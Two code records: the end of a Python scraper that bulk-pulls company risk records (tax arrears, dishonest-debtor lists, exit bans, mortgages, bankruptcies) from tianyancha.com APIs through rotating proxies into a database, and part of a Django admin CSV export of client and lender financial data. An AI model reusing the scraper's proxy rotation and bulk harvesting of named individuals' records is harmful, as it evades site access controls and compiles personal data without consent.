try:\n case_type = item['case_type']\n department = item['department']\n taxpayer_name = item['taxpayer_name']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_tax_money(company_id=company_id, company_num=company_num,\n case_type=case_type, department=department,\n taxpayer_name=taxpayer_name,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--tax_money-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 动产抵押 3\ndef home_mortgage(company_id, company_num):\n import json\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num, \"type\": -100}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/chattelMortgage/companyMortgage.json?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- home_mortgage -----\")\n\n time.sleep(0.4)\n try:\n if type(d[\"data\"])==type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n regDate = item['baseInfo']['regDate']\n regNum = item['baseInfo']['regNum']\n peopleInfo = str(item['peopleInfo'])\n mortgagorInfo = str(item['mortgagorInfo'])\n overviewType = item['baseInfo']['overviewType']\n amount = item['baseInfo']['amount']\n overviewTerm = item['baseInfo']['overviewTerm']\n regDepartment = item['baseInfo']['regDepartment']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_home_mortgage(company_id=company_id, company_num=company_num,\n reg_date=regDate, reg_num=regNum,\n people_info=peopleInfo, mort_gagor_info=mortgagorInfo,\n over_view_type=overviewType,\n amount=amount, over_view_term=overviewTerm,\n reg_department=regDepartment,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n 
session.commit()\n print(\"--home_mortgage-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Environmental penalties 3\ndef Environmental_money(company_id, company_num):\n while 1:\n try:\n data = {\"withOwner\": 0, \"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num,\n \"punishYear\": -100}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/environmental/getEnvironmentalPenaltiesNew?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- Environmental_money -----\")\n\n time.sleep(0.4)\n\n try:\n if isinstance(d[\"data\"], str):\n items = json.loads(d[\"data\"])['result']\n else:\n items = d[\"data\"]['result']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n publish_time = parse_time(item['publish_time'])\n punish_number = item['punish_number']\n punish_reason = item['punish_reason']\n punish_content = item['punish_content']\n punish_department = item['punish_department']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_environmental_money(company_id=company_id, company_num=company_num,\n publish_time=publish_time, punish_number=punish_number,\n punish_reason=punish_reason, punish_content=punish_content,\n punish_department=punish_department,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--Environmental_money-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Overdue-tax notices 3\ndef owe_tax_notice(company_id, company_num):\n while 1:\n try:\n data = {\"history\": False, \"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-operating-risk/operating/tax/companyowntax.json?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- owe_tax_notice -----\")\n time.sleep(0.4)\n\n try:\n if isinstance(d[\"data\"], str):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n except Exception:\n break\n\n if items == None or items == []:\n break\n for item in items:\n try:\n legalpersonName = item['legalpersonName']\n location = item['location']\n name = item['name']\n newOwnTaxBalance = item['newOwnTaxBalance']\n ownTaxBalance = item['ownTaxBalance']\n publishDate = item['publishDate']\n taxCategory = item['taxCategory']\n taxIdNumber = item['taxIdNumber']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_owe_tax_notice(company_id=company_id, company_num=company_num,\n legalperson_name=legalpersonName, location=location,\n name=name, new_own_tax_balance=newOwnTaxBalance,\n own_tax_balance=ownTaxBalance,\n publish_date=publishDate,\n tax_category=taxCategory,\n taxId_number=taxIdNumber,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--owe_tax_notice-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Consumption restriction orders 3\ndef limit_consumer(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/getRestrictOrder?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- limit_consumer 
-----\")\n\n time.sleep(0.4)\n\n try:\n if type(d[\"data\"]) == type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n publish_date = item['publishDate']\n case_code = item['caseCode']\n qy_info = item['qyinfo']\n x_name = item['xname']\n applicant = item['applicant']\n case_create_time = parse_time(item['caseCreateTime'])\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_limit_consumer(company_id=company_id, company_num=company_num,\n publish_date=publish_date, case_code=case_code,\n qy_info=qy_info, x_name=x_name, applicant=applicant,\n case_create_time=case_create_time,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--limit_consumer-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 失信被执行人3\ndef dishonest(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"performance\": -100, \"year\": -100, \"keyWords\": \"\", \"pageSize\": 100,\n \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/dishonest?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- dishonest -----\")\n time.sleep(0.4)\n try:\n if type(d[\"data\"]) == type(''):\n items = json.loads(d[\"data\"])['items']\n else:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n iname = item['iname']\n disrupttypename = item['disrupttypename']\n casecode = item['casecode']\n performance = item['performance']\n regdate = parse_time(item['regdate'])\n publishdate = parse_time(item['publishdate'])\n gistunit = item['gistunit']\n gistid = item['gistid']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_dishonest(company_id=company_id, company_num=company_num,\n i_name=iname, disrupt_type_name=disrupttypename,\n case_code=casecode, performance=performance, reg_date=regdate,\n publish_date=publishdate, gist_unit=gistunit, gis_tid=gistid,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--dishonest-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# 限制出境3\ndef limit_out_city(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/company/restrictedOutbound/list?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- limit_out_city -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['caseList']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n issue_date = item['issueDate']\n human_name = item['humanName']\n executed = str(item['executed'])\n executed_address = item['executedAddress']\n applicant = str(item['applicant'])\n money = item['money']\n court = item['court']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_limit_out_city(company_id=company_id, company_num=company_num,\n issue_date=issue_date, human_name=human_name,\n executed=executed, executed_address=executed_address,\n 
# Exit bans 3\ndef limit_out_city(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/risk/company/restrictedOutbound/list?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n print(\"----- limit_out_city -----\")\n\n time.sleep(0.4)\n try:\n items = d[\"data\"]['caseList']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n issue_date = item['issueDate']\n human_name = item['humanName']\n executed = str(item['executed'])\n executed_address = item['executedAddress']\n applicant = str(item['applicant'])\n money = item['money']\n court = item['court']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_limit_out_city(company_id=company_id, company_num=company_num,\n issue_date=issue_date, human_name=human_name,\n executed=executed, executed_address=executed_address,\n applicant=applicant, money=money, court=court,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--limit_out_city-- over\")\n break\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\n# Bankruptcy reorganizations 3\ndef break_rebuild(company_id, company_num):\n while 1:\n try:\n data = {\"_\": \"1663054546144\", \"pageSize\": 100, \"pageNum\": 1, \"gid\": company_num}\n d = requests.get(\n \"https://capi.tianyancha.com/cloud-judicial-risk/bankruptcy/list?\",\n headers=headers, params=data, proxies=proxys[-1], timeout=8).json()\n\n print(\"----- break_rebuild -----\")\n time.sleep(0.4)\n try:\n items = d[\"data\"]['items']\n except Exception:\n break\n if items == None or items == []:\n break\n for item in items:\n try:\n submitTime = item['submitTime']\n caseNo = item['caseNo']\n caseType = item['caseType']\n applicant = str(item['applicant'])\n respondent = item['respondent']\n court = item['court']\n times = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n\n Patent = risk_break_rebuild(company_id=company_id, company_num=company_num,\n submit_time=submitTime, case_no=caseNo,\n case_type=caseType, applicant=applicant, respondent=respondent,\n court=court,\n gmt_created=times, gmt_updated=times)\n except Exception:\n continue\n else:\n session.add(Patent)\n finally:\n session.commit()\n print(\"--break_rebuild-- over\")\n break\n\n except Exception as e:\n print(e)\n time.sleep(0.4)\n dl(proxys)\n\n\ndef parse_time(timeStamp):\n otherStyleTime = None\n try:\n if timeStamp == None or timeStamp == '':\n return None\n timeStamp = int(timeStamp / 1000)\n timeArray = time.localtime(timeStamp)\n otherStyleTime = time.strftime(\"%Y-%m-%d\", timeArray)\n except Exception as e:\n print(e)\n finally:\n return otherStyleTime\n\n\n# def patent_unique(table, param2):\n# data = session.query(table).filter(table.apply_num == param2).first()\n# return True if data == None else False\n#\n#\n# def soft_unique(table, param2):\n# data = session.query(table).filter(table.reg_num == param2).first()\n# return True if data == None else False\n\n\nif __name__ == '__main__':\n proxys = [{}]\n dl(proxys)\n\n data = session.query(sheet1).filter(sheet1.company_id != None, sheet1.company_num != None).all()\n print(len(data))\n for index,d in enumerate(data[16000:20000]):\n # if index<5 :\n # continue\n company_id = d.company_id\n company_num = d.company_num\n print(company_id,company_num)\n patent(company_id, company_num)\n soft(company_id, company_num)\n Administrative_penalties(company_id, company_num)\n business_exception(company_id, company_num)\n Serious_violation(company_id, company_num)\n tax_money(company_id, company_num)\n home_mortgage(company_id, company_num)\n Environmental_money(company_id, company_num)\n owe_tax_notice(company_id, company_num)\n limit_consumer(company_id, company_num)\n dishonest(company_id, company_num)\n limit_out_city(company_id, company_num)\n break_rebuild(company_id, company_num)\n","sub_path":"软著专利/spider5.py","file_name":"spider5.py","file_ext":"py","file_size_in_byte":37049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"211862205","text":"from django.contrib import admin\nfrom .models import *\nfrom django.forms.models import model_to_dict\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\nimport csv\nimport datetime\n\nbools = {\n True: 'Yes',\n False: 'No'\n}\n\n# 
https://docs.djangoproject.com/en/2.1/ref/contrib/admin/#django.contrib.admin.ModelAdmin.list_display\n# http://books.agiliq.com/projects/django-admin-cookbook/en/latest/export.html\n# ... export functions will go here ..\n\n\n################################################################################\n# CLIENT EXPORT\n################################################################################\ndef export_client_csv(modeladmin, request, queryset):\n date = datetime.datetime.now().date()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=client_export_' + str(date) + '.csv'\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n finance_attr = {}\n qualifiers = {}\n needs = {}\n\n finance_attr_obj = ClientFinancialInfoAttr.objects.all()\n q_obj = Qualifier.objects.all()\n n_obj = NeedsList.objects.all()\n\n for a in finance_attr_obj:\n finance_attr[a.id] = a.name\n\n for q in q_obj:\n qualifiers[q.id] = q.name\n\n for n in n_obj:\n needs[n.id] = n.name\n\n header = [\n smart_str(u\"Client First Name\"),\n smart_str(u\"Client Last Name\"),\n smart_str(u\"Client Street Address\"),\n smart_str(u\"Client City\"),\n smart_str(u\"Client State\"),\n smart_str(u\"Client Zip Code\"),\n smart_str(u\"Client Primary Email\"),\n smart_str(u\"Client Secondary Email\"),\n smart_str(u\"Client Work Phone\"),\n smart_str(u\"Client Cell Phone\"),\n smart_str(u\"Client Fax Phone\"),\n smart_str(u\"Client Other Phone\"),\n\n smart_str(u\"Occupation\"),\n smart_str(u\"Company Name\"),\n smart_str(u\"Company Street Address\"),\n smart_str(u\"Company City\"),\n smart_str(u\"Company State\"),\n smart_str(u\"Company Zip\"),\n\n smart_str(u\"Loan Amount\"),\n smart_str(u\"Loan To Value\"),\n smart_str(u\"Loan DSCR\"),\n smart_str(u\"Loan Description\"),\n\n smart_str(u\"Salary\"),\n smart_str(u\"Years In Business\"),\n smart_str(u\"Debt\"),\n smart_str(u\"Monthly Payments\"),\n smart_str(u\"FICO\"),\n ]\n\n for finance_attr_id in sorted(finance_attr):\n header.append(smart_str(finance_attr[finance_attr_id]))\n\n header.extend([\n smart_str(u\"Property Address\"),\n smart_str(u\"Property Value\"),\n\n smart_str(u\"Business Name\"),\n smart_str(u\"Business Main Phone\"),\n smart_str(u\"Business Website\"),\n smart_str(u\"Business Type\"),\n smart_str(u\"Year Business Established\"),\n ])\n\n for q_id in sorted(qualifiers):\n header.append(smart_str(qualifiers[q_id]))\n\n for n_id in sorted(needs):\n header.append(smart_str(needs[n_id]))\n\n writer.writerow(header)\n\n client411 = queryset.select_related(\n 'clientemploymentinfo',\n 'clientloaninfo',\n 'clientfinancialinfo',\n 'clientpropertyinfo',\n 'clientbusinessinfo'\n )\n\n for client in client411:\n fields = [\n smart_str(client.user.first_name),\n smart_str(client.user.last_name),\n smart_str(client.user.address),\n smart_str(client.user.city),\n smart_str(client.user.state),\n smart_str(client.user.zip_code),\n smart_str(client.user.email),\n smart_str(client.user.email_x),\n smart_str(client.user.phone_w),\n smart_str(client.user.phone_m),\n smart_str(client.user.phone_f),\n smart_str(client.user.phone_o),\n ]\n\n if hasattr(client, 'clientemploymentinfo'):\n fields.extend([\n smart_str(client.clientemploymentinfo.occupation),\n smart_str(client.clientemploymentinfo.company_name),\n smart_str(client.clientemploymentinfo.address),\n smart_str(client.clientemploymentinfo.city),\n 
smart_str(client.clientemploymentinfo.state),\n smart_str(client.clientemploymentinfo.zip_code),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientloaninfo'):\n fields.extend([\n smart_str(client.clientloaninfo.amount),\n smart_str(client.clientloaninfo.loan2val),\n smart_str(client.clientloaninfo.dscr),\n smart_str(client.clientloaninfo.desc),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientfinancialinfo'):\n fields.extend([\n smart_str(client.clientfinancialinfo.salary),\n smart_str(client.clientfinancialinfo.yrs_in_biz),\n smart_str(client.clientfinancialinfo.debt),\n smart_str(client.clientfinancialinfo.mnthly_pymnts),\n smart_str(client.clientfinancialinfo.fico),\n ])\n\n client_finance_attr = []\n\n # need to get ClientFinancialInfo pk\n f_obj = ClientFinancialInfo.objects.get(client_id=client.id)\n\n for attr in client.clientfinancialinfo.attr.through.objects.filter(clientfinancialinfo_id = f_obj.id):\n # clientfinancialinfoattr_id is the field name in the m2m table\n client_finance_attr.append(attr.clientfinancialinfoattr_id)\n\n for attr_id in sorted(finance_attr):\n if attr_id in client_finance_attr:\n fields.append('Yes')\n else:\n fields.append('No')\n\n\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientpropertyinfo'):\n fields.extend([\n smart_str(client.clientpropertyinfo.address),\n smart_str(client.clientpropertyinfo.value),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n ])\n\n if hasattr(client, 'clientbusinessinfo'):\n fields.extend([\n smart_str(client.clientbusinessinfo.name),\n smart_str(client.clientbusinessinfo.phone),\n smart_str(client.clientbusinessinfo.url),\n smart_str(client.clientbusinessinfo.btype),\n smart_str(client.clientbusinessinfo.est),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n smart_str(''),\n ])\n\n client_qualifiers = []\n\n for q in client.qualifiers.through.objects.filter(client_id = client.id):\n client_qualifiers.append(q.qualifier_id)\n\n for q_id in sorted(qualifiers):\n if q_id in client_qualifiers:\n fields.append('Yes')\n else:\n fields.append('No')\n\n client_needs = []\n\n for n in client.needs.through.objects.filter(client_id = client.id):\n client_needs.append(n.id)\n\n for n_id in sorted(needs):\n if n_id in client_needs:\n fields.append('Yes')\n else:\n fields.append('No')\n\n writer.writerow(fields)\n # end for\n\n return response\nexport_client_csv.short_description = u\"Client Export CSV\"\n\nclass ClientAdmin(admin.ModelAdmin):\n model = Client\n list_display = ['get_first_name', 'get_last_name']\n actions = [export_client_csv]\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n get_first_name.short_description = 'First Name'\n get_first_name.admin_order_field = 'user__first_name'\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n get_last_name.short_description = 'Last Name'\n get_last_name.admin_order_field = 'user__last_name'\n\n# end ClientAdmin\n\n# NOTE disable till fields are fixed\nadmin.site.register(Client, ClientAdmin)\n\n\n################################################################################\n# LENDER EXPORT\n################################################################################\ndef 
export_lender_csv(modeladmin, request, queryset):\n\n date = datetime.datetime.now().date()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=lender_export_' + str(date) + '.csv'\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n qualifiers = {}\n propertytypes = {}\n\n q_obj = Qualifier.objects.all()\n pt_obj = PropertyType.objects.all()\n\n header = [\n smart_str(u\"Lender First Name\"),\n smart_str(u\"Lender Last Name\"),\n smart_str(u\"Lender Company\"),\n smart_str(u\"Lender Street Address\"),\n smart_str(u\"Lender City\"),\n smart_str(u\"Lender State\"),\n smart_str(u\"Lender Zip Code\"),\n smart_str(u\"Lender Primary Email\"),\n smart_str(u\"Lender Secondary Email\"),\n smart_str(u\"Lender Work Phone\"),\n smart_str(u\"Lender Mobile Phone\"),\n smart_str(u\"Lender Fax Phone\"),\n smart_str(u\"Lender Other Phone\"),\n smart_str(u\"Lender Type\"),\n smart_str(u\"Loan Amount\"),\n\n smart_str(u\"Lender Solicitation?\"),\n smart_str(u\"Pays Broker Fees?\"),\n smart_str(u\"Pays Broker Rebate?\"),\n smart_str(u\"Pays via 1099?\"),\n smart_str(u\"Pays through Escrow?\"),\n\n smart_str(u\"Owner Occ. Office?\"),\n smart_str(u\"Owner Occ. Warehouse?\"),\n smart_str(u\"Owner Occ. Manufacturing?\"),\n smart_str(u\"Owner Occ. Medical?\"),\n smart_str(u\"Owner Occ. Mixed Use?\"),\n smart_str(u\"Owner Occ. Industrial?\"),\n smart_str(u\"Owner Occ. Other?\"),\n\n smart_str(u\"Investment Office?\"),\n smart_str(u\"Investment Warehouse?\"),\n smart_str(u\"Investment Manufacturing?\"),\n smart_str(u\"Investment Medical?\"),\n smart_str(u\"Investment Mixed Use?\"),\n smart_str(u\"Investment Industrial?\"),\n smart_str(u\"Investment Other?\"),\n\n smart_str(u\"MultiFamily 2 to 4\"),\n smart_str(u\"MultiFamily more than 4\"),\n\n smart_str(u\"Construction Renovation\"),\n smart_str(u\"Construction Ground Up Spec\"),\n smart_str(u\"Construction Commercial\"),\n smart_str(u\"Construction Residential\"),\n smart_str(u\"Construction Investment with Land\"),\n smart_str(u\"Construction Owner Occ with Land\"),\n smart_str(u\"Construction Investor\"),\n\n smart_str(u\"SBA 7a?\"),\n smart_str(u\"SBA 504?\"),\n smart_str(u\"SBA CAPline?\"),\n smart_str(u\"SBA Microloan?\"),\n smart_str(u\"SBA Express?\"),\n smart_str(u\"SBA ITL?\"),\n smart_str(u\"SBA Other?\"),\n\n smart_str(u\"HELOC 1st Position\"),\n smart_str(u\"HELOC 2nd Position\"),\n smart_str(u\"HELOC 3rd Position\"),\n\n smart_str(u\"BLOC Residential Property\"),\n smart_str(u\"BLOC Stocks\"),\n smart_str(u\"BLOC Savings\"),\n smart_str(u\"BLOC Investment Property\"),\n smart_str(u\"BLOC 1st Position\"),\n smart_str(u\"BLOC 2nd Position\"),\n smart_str(u\"BLOC Equipment\"),\n smart_str(u\"BLOC Working Capital\"),\n smart_str(u\"BLOC Interest Only\"),\n smart_str(u\"BLOC Secured by Accts Receivable\"),\n smart_str(u\"BLOC Secured by Inventory\"),\n smart_str(u\"BLOC RE Secured\"),\n smart_str(u\"BLOC RE Unsecured\"),\n\n smart_str(u\"Bridge?\"),\n smart_str(u\"Commercial Term?\"),\n smart_str(u\"USDA?\"),\n smart_str(u\"Stated Income?\"),\n ]\n\n for q in q_obj:\n qualifiers[q.id] = q.name\n\n for q_id in sorted(qualifiers):\n header.append(smart_str(qualifiers[q_id]))\n\n for p in pt_obj:\n propertytypes[p.id] = p.name\n\n for pt_id in sorted(propertytypes):\n header.append(smart_str(propertytypes[pt_id]))\n\n writer.writerow(header)\n\n lender411 = queryset.select_related(\n 
'lenderbrokerrelation',\n 'lenderowneroccupiedre',\n 'lenderinvestmentre',\n 'lendermultifamilyloan',\n 'lenderconstructionloan',\n 'lendersbaloan',\n 'lenderhelocloan',\n 'lenderblocloan',\n 'lenderbridgeloan')\n\n# https://stackoverflow.com/questions/37652520/django-select-related-in-reverse/37792783\n for lender in lender411:\n fields = [\n smart_str(lender.user.first_name),\n smart_str(lender.user.last_name),\n smart_str(lender.company),\n smart_str(lender.user.address),\n smart_str(lender.user.city),\n smart_str(lender.user.state),\n smart_str(lender.user.zip_code),\n smart_str(lender.user.email),\n smart_str(lender.user.email_x),\n smart_str(lender.user.phone_w),\n smart_str(lender.user.phone_m),\n smart_str(lender.user.phone_f),\n smart_str(lender.user.phone_o),\n smart_str(lender.lendertype),\n smart_str(lender.loanamt),\n ]\n\n # https://stackoverflow.com/questions/10487278/how-to-declare-and-add-items-to-an-array-in-python\n # https://stackoverflow.com/questions/27064206/django-check-if-a-related-object-exists-error-relatedobjectdoesnotexist\n if hasattr(lender, 'lenderbrokerrelation'):\n fields.extend([\n smart_str(lender.lenderbrokerrelation.solicit),\n smart_str(bools[lender.lenderbrokerrelation.pays_brkr_fees]),\n smart_str(bools[lender.lenderbrokerrelation.pays_brkr_rebate]),\n smart_str(bools[lender.lenderbrokerrelation.pays_1099]),\n smart_str(bools[lender.lenderbrokerrelation.pays_escrow]),\n ])\n else:\n fields.extend([\n smart_str(''),\n smart_str('No'),\n smart_str('No'),\n smart_str('No'),\n smart_str('No'),\n ])\n\n if hasattr(lender, 'lenderowneroccupiedre'):\n fields.extend([\n smart_str(bools[lender.lenderowneroccupiedre.office]),\n smart_str(bools[lender.lenderowneroccupiedre.warehouse]),\n smart_str(bools[lender.lenderowneroccupiedre.manufacturing]),\n smart_str(bools[lender.lenderowneroccupiedre.medical]),\n smart_str(bools[lender.lenderowneroccupiedre.mixed_use]),\n smart_str(bools[lender.lenderowneroccupiedre.industrial]),\n smart_str(bools[lender.lenderowneroccupiedre.other]),\n ])\n\n if hasattr(lender, 'lenderinvestmentre'):\n fields.extend([\n smart_str(bools[lender.lenderinvestmentre.office]),\n smart_str(bools[lender.lenderinvestmentre.warehouse]),\n smart_str(bools[lender.lenderinvestmentre.manufacturing]),\n smart_str(bools[lender.lenderinvestmentre.medical]),\n smart_str(bools[lender.lenderinvestmentre.mixed_use]),\n smart_str(bools[lender.lenderinvestmentre.industrial]),\n smart_str(bools[lender.lenderinvestmentre.other]),\n ])\n\n if hasattr(lender, 'lendermultifamilyloan'):\n fields.extend([\n smart_str(bools[lender.lendermultifamilyloan.mf_2to4]),\n smart_str(bools[lender.lendermultifamilyloan.mf_gt4]),\n ])\n\n if hasattr(lender, 'lenderconstructionloan'):\n fields.extend([\n smart_str(bools[lender.lenderconstructionloan.renovation]),\n smart_str(bools[lender.lenderconstructionloan.ground_up_spec]),\n smart_str(bools[lender.lenderconstructionloan.commercial]),\n smart_str(bools[lender.lenderconstructionloan.residential]),\n smart_str(bools[lender.lenderconstructionloan.inv_w_land]),\n smart_str(bools[lender.lenderconstructionloan.oo_w_land]),\n smart_str(bools[lender.lenderconstructionloan.investor]),\n ])\n\n if hasattr(lender, 'lendersbaloan'):\n fields.extend([\n smart_str(bools[lender.lendersbaloan.sba_7a]),\n smart_str(bools[lender.lendersbaloan.sba_504]),\n smart_str(bools[lender.lendersbaloan.CAPline]),\n smart_str(bools[lender.lendersbaloan.micro]),\n smart_str(bools[lender.lendersbaloan.express]),\n 
smart_str(bools[lender.lendersbaloan.itl]),\n smart_str(bools[lender.lendersbaloan.other]),\n ])\n\n if hasattr(lender, 'lenderhelocloan'):\n fields.extend([\n smart_str(bools[lender.lenderhelocloan.pos_1]),\n smart_str(bools[lender.lenderhelocloan.pos_2]),\n smart_str(bools[lender.lenderhelocloan.pos_3]),\n ])\n\n if hasattr(lender, 'lenderblocloan'):\n fields.extend([\n smart_str(bools[lender.lenderblocloan.resid_prop]),\n smart_str(bools[lender.lenderblocloan.stocks]),\n smart_str(bools[lender.lenderblocloan.savings]),\n smart_str(bools[lender.lenderblocloan.inv_prop]),\n smart_str(bools[lender.lenderblocloan.pos1]),\n smart_str(bools[lender.lenderblocloan.pos2]),\n smart_str(bools[lender.lenderblocloan.equipment]),\n smart_str(bools[lender.lenderblocloan.work_cap]),\n smart_str(bools[lender.lenderblocloan.int_only]),\n smart_str(bools[lender.lenderblocloan.sec_accts_rec]),\n smart_str(bools[lender.lenderblocloan.sec_inv]),\n smart_str(bools[lender.lenderblocloan.re_secure]),\n smart_str(bools[lender.lenderblocloan.re_unsecure]),\n ])\n\n if hasattr(lender, 'lenderbridgeloan'):\n fields.extend([\n smart_str(bools[lender.lenderbridgeloan.bridge]),\n smart_str(bools[lender.lenderbridgeloan.comm_term]),\n smart_str(bools[lender.lenderbridgeloan.usda]),\n smart_str(bools[lender.lenderbridgeloan.stated_inc]),\n ])\n\n\n # XXX could use a refactor here\n lender_qualifiers = []\n\n for q in lender.qualifiers.through.objects.filter(lender_id = lender.id):\n lender_qualifiers.append(q.qualifier_id)\n\n for q_id in sorted(qualifiers):\n if q_id in lender_qualifiers:\n fields.append('Yes')\n else:\n fields.append('No')\n\n\n lender_propertytypes = []\n\n for pt in lender.propertytypes.through.objects.filter(lender_id = lender.id):\n lender_propertytypes.append(pt.propertytype_id)\n\n for pt_id in sorted(propertytypes):\n if pt_id in lender_propertytypes:\n fields.append('Yes')\n else:\n fields.append('No')\n\n writer.writerow(fields)\n # end for\n\n return response\n# end def \n\nexport_lender_csv.short_description = u\"Lender CSV Export\"\n\n# get_name\n# https://stackoverflow.com/questions/163823/can-list-display-in-a-django-modeladmin-display-attributes-of-foreignkey-field\nclass LenderAdmin(admin.ModelAdmin):\n model = Lender\n list_display = ['get_first_name', 'get_last_name']\n actions = [export_lender_csv]\n\n #def get_name(self, obj):\n # return obj.user.first_name + ' ' + obj.user.last_name\n #get_name.admin_order_field = Concat('user__first_name', Value(' '), 'user__last_name')\n\n def get_first_name(self, obj):\n return obj.user.first_name\n\n get_first_name.short_description = 'First Name'\n get_first_name.admin_order_field = 'user__first_name'\n\n def get_last_name(self, obj):\n return obj.user.last_name\n\n get_last_name.short_description = 'Last Name'\n get_last_name.admin_order_field = 'user__last_name'\n\n# end LenderAdmin\n\n# NOTE disabling until fields are fixed\nadmin.site.register(Lender, LenderAdmin)\n\n\n\n\n################################################################################\n# BROKER EXPORT\n################################################################################\ndef export_broker_csv(modeladmin, request, queryset):\n\n date = datetime.datetime.now().date()\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=broker_export_' + str(date) + '.csv'\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n 
